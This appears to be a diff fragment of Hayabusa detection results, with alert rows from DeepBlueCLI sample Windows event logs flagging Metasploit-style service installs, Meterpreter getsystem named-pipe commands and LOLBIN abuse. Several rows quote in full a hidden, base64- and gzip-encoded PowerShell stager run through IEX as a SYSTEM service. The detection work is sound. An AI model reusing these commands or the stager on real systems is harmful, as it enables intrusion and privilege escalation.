+2016-09-20 06:00:33.590 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,info,,New Service Installed,Name: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,info,,New Service Installed,Name: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,info,,New Service Installed,Name: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,info,,New Service Installed,Name: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x294 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
